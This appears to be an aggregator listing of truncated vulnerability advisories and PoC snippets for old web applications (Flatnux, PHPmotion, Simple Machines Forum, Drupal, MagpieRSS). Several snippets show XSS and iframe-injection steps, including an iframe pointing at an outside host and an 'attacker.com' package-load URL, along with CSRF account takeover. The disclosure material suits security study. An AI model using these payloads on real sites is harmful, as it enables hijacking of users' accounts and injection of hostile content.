phpinfo cross-site scripting vulnerability-vulnerability warning-the black bar safety net

Vulnerability description: php is a widely used programming language, can be nested in the html with a to do web app development. phpinfois used to display the current php environment is a function of many site and program will phpinfo on your own site or on a program, but phpinfo in the presence...

Drupal XSS Password Changer

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Problem Description: There have been quite a few Cross Site Scripting XSS vulnerabilities discovered in Drupal modules recently. Many people scoff at XSS and even argue that it's a low threat vulnerability. In many cases this is certainly true, howeve...

the iframe of the anti-plug-crack-vulnerability warning-the black bar safety net

Author: emptiness prodigal heart See Monyer of the article: the iframe of the anti-Plug and plug-on http://hi.baidu.com/monyer/blog/item/108c718d9aedcf15b21bba56.html The code is as follows: the window. onload = function iftop!= self var f = document. createElement"form"; f. action=location; f...

Flatnux XSS / IFrame Injection

/ - Flatnux-2009-01-27 XSS/Iframe injection p0c + 1 Create acount + 1 Go to http://localhost/flatnux/?mod=login&op=modprof&user=username - Set iframe in the Job fields Jobless l0l + 3 Now m4k3 frieNdship witch Sheep Greetings : cOndemned , sid.psycho , wszyscy których ników nie umie wymówić :P an...

Flatnux 2009-01-27 (Job fields) XSS/Iframe Injection PoC

No description provided by source. / - Flatnux-2009-01-27 XSS/Iframe injection p0c + 1 Create acount + 1 Go to http://localhost/flatnux/?mod=login&op=modprof&user=username - Set iframe in the Job fields Jobless l0liframe src=http://0xc00000fdh.boo.pl/flatnuxost.php...

Flatnux 2009-01-27 - Cross-Site Scripting Iframe Injection

Flatnux 2009-01-27 - Cross-Site Scripting Iframe Injection / - Flatnux-2009-01-27 XSS/Iframe injection p0c + 1 Create acount + 1 Go to http://localhost/flatnux/?mod=login&op=modprof&user=username - Set iframe in the Job fields Jobless l0l + 3 Now m4k3 frieNdship witch Sheep Greetings : cOndemned ...

Flatnux 2009-01-27 (Job fields) XSS/Iframe Injection PoC

Exploit for unknown platform in category web applications ======================================================== Flatnux 2009-01-27 Job fields XSS/Iframe Injection PoC ======================================================== / - Flatnux-2009-01-27 XSS/Iframe injection p0c + 1 Create acount + 1 ...

Flatnux 2009-01-27 - Cross-Site Scripting / Iframe Injection

/ - Flatnux-2009-01-27 XSS/Iframe injection p0c + 1 Create acount + 1 Go to http://localhost/flatnux/?mod=login&op=modprof&user=username - Set iframe in the Job fields Jobless l0l + 3 Now m4k3 frieNdship witch Sheep Greetings : cOndemned , sid.psycho , wszyscy których ników nie umie wymówić :...

Charset Inheritance vulnerability in Internet Explorer 6 и Google Chrome

Здравствуйте 3APA3A! Сообщаю вам о найденной мною Charset Inheritance уязвимости в Internet Explorer 6 и Google Chrome. В дополнение к ранее опубликованной информации http://securityvulns.ru/news/Browsers/Charset/XSS.html о данной уязвимости в других браузерах. Данная уязвимость в браузерах,...

w3schools.com IFrame Injection

----------------------------------------------------------------------------------------------- + w3schools.com suffers from a iframe injection vulnerability + Author: Rohit Bansal ---------------------------------------------------------------------------------------...

Simple Machines Forum <= 1.1.7 XSRF/XSS/Package Upload Vuln

No description provided by source. Author: Xianur0 Vulnerable Version: All The Bug is located in the file: Sources/PackageGet.php Example: http://victm.com/index.php?action=packageget;sa=browse;absolute=http://attacker.com When the admin link between the SMF to load the file:...

CVE-2008-5761

Multiple cross-site scripting XSS vulnerabilities in FlatnuX CMS aka Flatnuke3 2008-12-11 allow remote attackers to inject arbitrary web script or HTML via 1 the mod parameter to the default URI; 2 the foto parameter to photo.php in the 05Foto module; or 3 the name parameter in an insertrecord...

Cross site scripting

Multiple cross-site scripting XSS vulnerabilities in FlatnuX CMS aka Flatnuke3 2008-12-11 allow remote attackers to inject arbitrary web script or HTML via 1 the mod parameter to the default URI; 2 the foto parameter to photo.php in the 05Foto module; or 3 the name parameter in an insertrecord...

CVE-2008-5761

CVE-2008-5761 affects FlatnuX CMS (aka Flatnuke3). The provided documents describe multiple cross-site scripting (XSS) vulnerabilities: (1) via the mod parameter in the default URI, (2) via the foto parameter to photo.php in the 05_Foto module, and (3) via the name parameter in an insertrecord ac...

PHPmotion 2.1 Cross Site Request Forgery

PHPmotion Source of pwned.html file: Once your victim has visited your evil page, You may now be able to log...

MagpieRSS XSS 0day

Hello, I have found a Cross Site Scripting vulnerability in MagpieRSS, an RSS parser written in PHP, basically, this piece of software enables users to add their own RSS feeds to be parsed, so they can keep up to date with their favourite feeds, as well as the pre-defined ones. I crafted my own R...

CVE-2008-5729

Multiple cross-site scripting XSS vulnerabilities in AIST NetCat 3.12 and earlier allow remote attackers to inject arbitrary web script or HTML via the 1 form and 2 control parameters to FCKeditor/neditor.php, and the 3 path parameter to admin/siteinfo/iframe.inc.php...

PHPmotion <= 2.1 CSRF Vulnerability

No description provided by source. PHPmotion = 2.1 CSRF vulnerability Author: Ausome1 Email: [email protected] Website: http://www.enigmagroup.org Description: Change a member's password and/or email...

PHPmotion 2.1 - Cross-Site Request Forgery

PHPmotion 2.1 - Cross-Site Request Forgery PHPmotion Source of pwned.html file: Once your victim has visited your evil page, You may now be able to log into their PHP...

PHPmotion 2.1 - Cross-Site Request Forgery

PHPmotion Source of pwned.html file: Once your victim has visited your evil page, You may now be able to log into their PHPMotion...